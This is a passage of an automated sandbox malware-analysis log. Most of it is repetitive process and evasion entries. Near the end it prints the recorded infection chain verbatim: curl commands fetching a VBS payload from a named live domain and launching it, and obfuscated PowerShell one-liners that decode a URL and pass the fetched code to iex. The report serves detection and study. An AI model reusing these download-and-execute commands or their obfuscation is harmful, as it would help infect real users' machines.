            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6109Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3663Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7135Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2558Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5760Thread sleep count: 6109 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5760Thread sleep count: 3663 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5960Thread sleep time: -15679732462653109s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3380Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6484Thread sleep count: 7135 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6484Thread sleep count: 2558 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6540Thread sleep time: -12912720851596678s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1776Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: wscript.exe, 00000007.00000002.2285013444.0000015CCDA2D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}7"
            Source: wscript.exe, 00000007.00000002.2285013444.0000015CCDA2D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\ "4636Z
            Source: wscript.exe, 00000007.00000002.2284685294.0000015CCBB0F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2281642188.0000015CCBB0A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.2284868153.0000015CCD9B2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2267622863.000001E9B13A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2266409480.000001E9AF351000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2262502439.000001E9AF34B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: wscript.exe, 00000007.00000002.2285013444.0000015CCDA2D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
            Source: powershell.exe, 0000000F.00000002.2435362967.0000024EBC242000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]
            Source: wscript.exe, 00000007.00000002.2284685294.0000015CCBB0F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.2281642188.0000015CCBB0A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWB
            Source: curl.exe, 00000004.00000003.2171270324.000001979CB45000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.2171485278.000001979CB48000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2352549438.000001CA6B584000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\System32\wscript.exeNetwork Connect: 45.11.180.77 443
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\67618a47ee8cd.vbs https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbsJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\67618a47ee8cd.vbsJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\67618a47ee8cd.vbsJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -k -o C:\Users\Public\67618a47ee8cd.vbs https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbsJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\67618a47ee8cd.vbs" Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\bmkvfo.jsJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\67618a47ee8cd.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\iethuj.js
            Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $nupqcmyikef='ur' ;new-alias printout c$($nupqcmyikef)l;$rhgdckzwb=(5296,5308,5304,5308,5303,5310,5291,5249,5315,5296,5244,5239,5309,5304,5305,5240,5242,5239,5305,5297,5305,5256,5308,5254,5302,5298,5303,5309,5308,5243,5242);$wcpdukmela=('bronx','get-cmdlet');$xpyktecohun=$rhgdckzwb;foreach($mtdgshwxfkuza in $xpyktecohun){$pqhkibc=$mtdgshwxfkuza;$iqmptoujlvgyh=$iqmptoujlvgyh+[char]($pqhkibc-5193);$tbjsczxqfh=$iqmptoujlvgyh; $wlupxmqob=$tbjsczxqfh};$yexnqzpivaugw[2]=$wlupxmqob;$xmdupkr='rl';$ocxjqszgpw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wlupxmqob)Jump to behavior
            Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $tiznsomryjec='ur' ;new-alias printout c$($tiznsomryjec)l;$ikgytfezh=(2594,2606,2602,2606,2601,2608,2589,2547,2613,2594,2542,2537,2607,2602,2603,2538,2540,2537,2603,2595,2603,2554,2606,2552,2600,2596,2601,2607,2606,2541,2540);$erxbmnil=('bronx','get-cmdlet');$nfpekqwz=$ikgytfezh;foreach($mdovnxu in $nfpekqwz){$oycmishnj=$mdovnxu;$yozmvglx=$yozmvglx+[char]($oycmishnj-2491);$agflovwuqxrnek=$yozmvglx; $ptzlyfg=$agflovwuqxrnek};$fwlxzitsjno[2]=$ptzlyfg;$aphsdzmcr='rl';$bkgejqchs=1;.$([char](9992-9887)+'e'+'x')(printout -useb $ptzlyfg)Jump to behavior
